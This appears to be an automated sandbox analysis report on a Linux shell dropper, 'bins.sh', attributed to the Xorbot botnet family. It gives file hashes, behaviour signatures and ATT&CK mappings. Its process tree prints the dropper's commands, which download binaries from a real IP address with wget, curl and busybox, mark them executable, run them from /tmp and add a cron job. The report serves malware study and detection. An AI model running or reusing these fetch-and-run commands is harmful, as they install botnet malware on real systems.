Analysis
-
max time kernel
149s -
max time network
162s -
platform
debian-9_armhf -
resource
debian9-armhf-20240611-en -
resource tags
arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
04/12/2024, 21:17
Static task
static1
Behavioral task
behavioral1
Sample
bins.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
bins.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
bins.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
bins.sh
Resource
debian9-mipsel-20240226-en
General
-
Target
bins.sh
-
Size
10KB
-
MD5
8580d3e0404771972a9f01c8f1022b41
-
SHA1
12009ebfa508f900f56d9da9a3fc0f058ce2227a
-
SHA256
838e2007e9ae8cb8aaa9c2f53b17d5503d751cdc59a5997e2b9228de843b38f1
-
SHA512
11d915de31c2a4cde4cd48529b3962db89f49307c35d963b9c4ee6e4edaa1eb02fd409d65305a4f30a6a0576ab134d3479071c9eee0d5bbf6b71b8151caacde9
-
SSDEEP
96:uxnn5zkwsZhf0wvJhVz6a/eHK9h1TksmBbQJhVz6aDyyLil8dm9h1Tksdg1PZhfZ:u0Zhf0wv9eHK0CHZhf0wx
Malware Config
Signatures
-
resource yara_rule behavioral2/files/fstream-3.dat family_xorbot behavioral2/files/fstream-5.dat family_xorbot -
Xorbot family
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Contacts a large (1906) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
File and Directory Permissions Modification 1 TTPs 3 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 695 chmod 706 chmod 730 chmod -
Executes dropped EXE 3 IoCs
ioc pid Process /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c 696 3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c /tmp/xo4idlUJaiiPjiiOV0cIUd0SGi73SQhZV8 707 xo4idlUJaiiPjiiOV0cIUd0SGi73SQhZV8 /tmp/WOPFKBEhpxNpsLb1mSRydCYTECwQrgMLmq 732 WOPFKBEhpxNpsLb1mSRydCYTECwQrgMLmq -
Renames itself 1 IoCs
pid Process 733 WOPFKBEhpxNpsLb1mSRydCYTECwQrgMLmq -
Creates/modifies Cron job 1 TTPs 1 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
description ioc Process File opened for modification /var/spool/cron/crontabs/tmp.XlKUED crontab -
Enumerates running processes
Discovers information about currently running processes on the system
-
Checks CPU configuration 1 TTPs 3 IoCs
Checks CPU information which indicate if the system is a virtual machine.
description ioc Process File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl -
description ioc Process File opened for reading /proc/772/cmdline WOPFKBEhpxNpsLb1mSRydCYTECwQrgMLmq File opened for reading /proc/783/cmdline WOPFKBEhpxNpsLb1mSRydCYTECwQrgMLmq File opened for reading /proc/973/cmdline WOPFKBEhpxNpsLb1mSRydCYTECwQrgMLmq File opened for reading /proc/978/cmdline WOPFKBEhpxNpsLb1mSRydCYTECwQrgMLmq File opened for reading /proc/19/cmdline WOPFKBEhpxNpsLb1mSRydCYTECwQrgMLmq File opened for reading /proc/456/cmdline WOPFKBEhpxNpsLb1mSRydCYTECwQrgMLmq File opened for reading /proc/790/cmdline WOPFKBEhpxNpsLb1mSRydCYTECwQrgMLmq File opened for reading /proc/813/cmdline WOPFKBEhpxNpsLb1mSRydCYTECwQrgMLmq File opened for reading /proc/841/cmdline WOPFKBEhpxNpsLb1mSRydCYTECwQrgMLmq File opened for reading /proc/3/cmdline WOPFKBEhpxNpsLb1mSRydCYTECwQrgMLmq File opened for reading /proc/309/cmdline WOPFKBEhpxNpsLb1mSRydCYTECwQrgMLmq File opened for reading /proc/770/cmdline WOPFKBEhpxNpsLb1mSRydCYTECwQrgMLmq File opened for reading /proc/792/cmdline WOPFKBEhpxNpsLb1mSRydCYTECwQrgMLmq File opened for reading /proc/808/cmdline WOPFKBEhpxNpsLb1mSRydCYTECwQrgMLmq File opened for reading /proc/756/cmdline WOPFKBEhpxNpsLb1mSRydCYTECwQrgMLmq File opened for reading /proc/762/cmdline WOPFKBEhpxNpsLb1mSRydCYTECwQrgMLmq File opened for reading /proc/814/cmdline WOPFKBEhpxNpsLb1mSRydCYTECwQrgMLmq File opened for reading /proc/652/cmdline WOPFKBEhpxNpsLb1mSRydCYTECwQrgMLmq File opened for reading /proc/768/cmdline WOPFKBEhpxNpsLb1mSRydCYTECwQrgMLmq File opened for reading /proc/817/cmdline WOPFKBEhpxNpsLb1mSRydCYTECwQrgMLmq File opened for reading /proc/840/cmdline WOPFKBEhpxNpsLb1mSRydCYTECwQrgMLmq File opened for reading /proc/866/cmdline WOPFKBEhpxNpsLb1mSRydCYTECwQrgMLmq File opened for reading /proc/920/cmdline WOPFKBEhpxNpsLb1mSRydCYTECwQrgMLmq File opened for reading /proc/979/cmdline WOPFKBEhpxNpsLb1mSRydCYTECwQrgMLmq File opened for reading /proc/793/cmdline WOPFKBEhpxNpsLb1mSRydCYTECwQrgMLmq File opened for reading /proc/809/cmdline WOPFKBEhpxNpsLb1mSRydCYTECwQrgMLmq File opened for reading /proc/745/cmdline WOPFKBEhpxNpsLb1mSRydCYTECwQrgMLmq File opened for reading /proc/779/cmdline WOPFKBEhpxNpsLb1mSRydCYTECwQrgMLmq File opened for reading /proc/997/cmdline WOPFKBEhpxNpsLb1mSRydCYTECwQrgMLmq File opened for reading /proc/1012/cmdline WOPFKBEhpxNpsLb1mSRydCYTECwQrgMLmq File opened for reading /proc/23/cmdline WOPFKBEhpxNpsLb1mSRydCYTECwQrgMLmq File opened for reading /proc/743/cmdline WOPFKBEhpxNpsLb1mSRydCYTECwQrgMLmq File opened for reading /proc/656/cmdline WOPFKBEhpxNpsLb1mSRydCYTECwQrgMLmq File opened for reading /proc/848/cmdline WOPFKBEhpxNpsLb1mSRydCYTECwQrgMLmq File opened for reading /proc/9/cmdline WOPFKBEhpxNpsLb1mSRydCYTECwQrgMLmq File opened for reading /proc/277/cmdline WOPFKBEhpxNpsLb1mSRydCYTECwQrgMLmq File opened for reading /proc/906/cmdline WOPFKBEhpxNpsLb1mSRydCYTECwQrgMLmq File opened for reading /proc/985/cmdline WOPFKBEhpxNpsLb1mSRydCYTECwQrgMLmq File opened for reading /proc/1004/cmdline WOPFKBEhpxNpsLb1mSRydCYTECwQrgMLmq File opened for reading /proc/21/cmdline WOPFKBEhpxNpsLb1mSRydCYTECwQrgMLmq File opened for reading /proc/879/cmdline WOPFKBEhpxNpsLb1mSRydCYTECwQrgMLmq File opened for reading /proc/2/cmdline WOPFKBEhpxNpsLb1mSRydCYTECwQrgMLmq File opened for reading /proc/797/cmdline WOPFKBEhpxNpsLb1mSRydCYTECwQrgMLmq File opened for reading /proc/746/cmdline WOPFKBEhpxNpsLb1mSRydCYTECwQrgMLmq File opened for reading /proc/777/cmdline WOPFKBEhpxNpsLb1mSRydCYTECwQrgMLmq File opened for reading /proc/842/cmdline WOPFKBEhpxNpsLb1mSRydCYTECwQrgMLmq File opened for reading /proc/862/cmdline WOPFKBEhpxNpsLb1mSRydCYTECwQrgMLmq File opened for reading /proc/899/cmdline WOPFKBEhpxNpsLb1mSRydCYTECwQrgMLmq File opened for reading /proc/961/cmdline WOPFKBEhpxNpsLb1mSRydCYTECwQrgMLmq File opened for reading /proc/15/cmdline WOPFKBEhpxNpsLb1mSRydCYTECwQrgMLmq File opened for reading /proc/82/cmdline WOPFKBEhpxNpsLb1mSRydCYTECwQrgMLmq File opened for reading /proc/964/cmdline WOPFKBEhpxNpsLb1mSRydCYTECwQrgMLmq File opened for reading /proc/1022/cmdline WOPFKBEhpxNpsLb1mSRydCYTECwQrgMLmq File opened for reading /proc/143/cmdline WOPFKBEhpxNpsLb1mSRydCYTECwQrgMLmq File opened for reading /proc/749/cmdline WOPFKBEhpxNpsLb1mSRydCYTECwQrgMLmq File opened for reading /proc/786/cmdline WOPFKBEhpxNpsLb1mSRydCYTECwQrgMLmq File opened for reading /proc/890/cmdline WOPFKBEhpxNpsLb1mSRydCYTECwQrgMLmq File opened for reading /proc/946/cmdline WOPFKBEhpxNpsLb1mSRydCYTECwQrgMLmq File opened for reading /proc/977/cmdline WOPFKBEhpxNpsLb1mSRydCYTECwQrgMLmq File opened for reading /proc/6/cmdline WOPFKBEhpxNpsLb1mSRydCYTECwQrgMLmq File opened for reading /proc/42/cmdline WOPFKBEhpxNpsLb1mSRydCYTECwQrgMLmq File opened for reading /proc/877/cmdline WOPFKBEhpxNpsLb1mSRydCYTECwQrgMLmq File opened for reading /proc/967/cmdline WOPFKBEhpxNpsLb1mSRydCYTECwQrgMLmq File opened for reading /proc/987/cmdline WOPFKBEhpxNpsLb1mSRydCYTECwQrgMLmq -
System Network Configuration Discovery 1 TTPs 5 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 699 wget 700 curl 703 busybox 707 xo4idlUJaiiPjiiOV0cIUd0SGi73SQhZV8 710 rm -
Writes file to tmp directory 9 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c wget File opened for modification /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c curl File opened for modification /tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c busybox File opened for modification /tmp/xo4idlUJaiiPjiiOV0cIUd0SGi73SQhZV8 wget File opened for modification /tmp/xo4idlUJaiiPjiiOV0cIUd0SGi73SQhZV8 busybox File opened for modification /tmp/WOPFKBEhpxNpsLb1mSRydCYTECwQrgMLmq curl File opened for modification /tmp/xo4idlUJaiiPjiiOV0cIUd0SGi73SQhZV8 curl File opened for modification /tmp/WOPFKBEhpxNpsLb1mSRydCYTECwQrgMLmq wget File opened for modification /tmp/WOPFKBEhpxNpsLb1mSRydCYTECwQrgMLmq busybox
Processes
-
/tmp/bins.sh/tmp/bins.sh1⤵PID:659
-
/bin/rm/bin/rm bins.sh2⤵PID:664
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c2⤵
- Writes file to tmp directory
PID:666
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c2⤵
- Checks CPU configuration
- Writes file to tmp directory
PID:681
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c2⤵
- Writes file to tmp directory
PID:693
-
-
/bin/chmodchmod 777 3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c2⤵
- File and Directory Permissions Modification
PID:695
-
-
/tmp/3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c./3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c2⤵
- Executes dropped EXE
PID:696
-
-
/bin/rmrm 3n59P9Mv9t2mSbpeiAW5ccTUhXaMEClY2c2⤵PID:698
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/xo4idlUJaiiPjiiOV0cIUd0SGi73SQhZV82⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:699
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/xo4idlUJaiiPjiiOV0cIUd0SGi73SQhZV82⤵
- Checks CPU configuration
- System Network Configuration Discovery
- Writes file to tmp directory
PID:700
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/xo4idlUJaiiPjiiOV0cIUd0SGi73SQhZV82⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:703
-
-
/bin/chmodchmod 777 xo4idlUJaiiPjiiOV0cIUd0SGi73SQhZV82⤵
- File and Directory Permissions Modification
PID:706
-
-
/tmp/xo4idlUJaiiPjiiOV0cIUd0SGi73SQhZV8./xo4idlUJaiiPjiiOV0cIUd0SGi73SQhZV82⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:707
-
-
/bin/rmrm xo4idlUJaiiPjiiOV0cIUd0SGi73SQhZV82⤵
- System Network Configuration Discovery
PID:710
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/WOPFKBEhpxNpsLb1mSRydCYTECwQrgMLmq2⤵
- Writes file to tmp directory
PID:711
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/WOPFKBEhpxNpsLb1mSRydCYTECwQrgMLmq2⤵
- Checks CPU configuration
- Writes file to tmp directory
PID:717
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/WOPFKBEhpxNpsLb1mSRydCYTECwQrgMLmq2⤵
- Writes file to tmp directory
PID:726
-
-
/bin/chmodchmod 777 WOPFKBEhpxNpsLb1mSRydCYTECwQrgMLmq2⤵
- File and Directory Permissions Modification
PID:730
-
-
/tmp/WOPFKBEhpxNpsLb1mSRydCYTECwQrgMLmq./WOPFKBEhpxNpsLb1mSRydCYTECwQrgMLmq2⤵
- Executes dropped EXE
- Renames itself
- Reads runtime system information
PID:732 -
/bin/shsh -c "crontab -l"3⤵PID:734
-
/usr/bin/crontabcrontab -l4⤵PID:735
-
-
-
/bin/shsh -c "crontab -"3⤵PID:737
-
/usr/bin/crontabcrontab -4⤵
- Creates/modifies Cron job
PID:738
-
-
-
-
/bin/rmrm WOPFKBEhpxNpsLb1mSRydCYTECwQrgMLmq2⤵PID:743
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/DkZt4FDc52hBagaKEs8ZyAlGMa2zwN3FW82⤵PID:746
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/DkZt4FDc52hBagaKEs8ZyAlGMa2zwN3FW82⤵PID:747
-
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Virtualization/Sandbox Evasion
1System Checks
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
151KB
MD56c583043d91c55aa470c08c87058e917
SHA1abf65a5b9bba69980278ad09356e53de8bb89439
SHA2562d63c81a782853efe672a1d9cb00a339ec57207b4075754a1baf1df9af466948
SHA51282ee5f3884edc2cb3e68d8634353964cdb991e250b0592a2f80f5ffb738e64860abe6d030aec0d6ab94596c275b478080579fd65b055cc9055e1ef3de6dd59a5
-
Filesize
127KB
MD589077b7bd4bcafca7713be43635c4862
SHA1fc02edb8fba29ea8ee99e6157ef8560334530052
SHA25678416feab0c93152d65acc8f48835520db083cc3aed0aea622b9fb88284dc00d
SHA5121b457b8f8d452eecaad9013241e50672befb70feb5349f5fa72d62ea1fa8affa968763e6511cc76cdc5bf12f080e4a8f10c8e141ccd0d36794e721d690f2c4b1
-
Filesize
122KB
MD5cd3d4b9c643e5b473fb4d88ed05f0716
SHA164ee7a97418583d759eaea8000890cc3bae1b5f4
SHA2560cbb1e62423a82d17a7b1c9def6a5570a8414f36e2623f1d82cd4e6281930944
SHA512164ee6eb1dc167f48a62683700bf3a4787f9ec4b12335e9e30d6670406324d111557b3be22fd6a9689b4f60562c8a3bf62867f2cae86c04cb1b01ee2e219cc52
-
Filesize
210B
MD5981396c975d731547d09f73ceb9646f1
SHA157494e8d2c47b3bd61faa8145190c5a35ae6f16c
SHA256f55a65d620422b0b61c048a75e106166213a1d26db89a87abbadb20a7b517988
SHA512c6957e1858d7a1c98353f2c1dd8cf27c09e7230e37f1fc6fcc188d6c3080c5ca1ccd4708adf86e73f575a5fe488bf11040c5da4f92ab2176d205744bdc8b7e49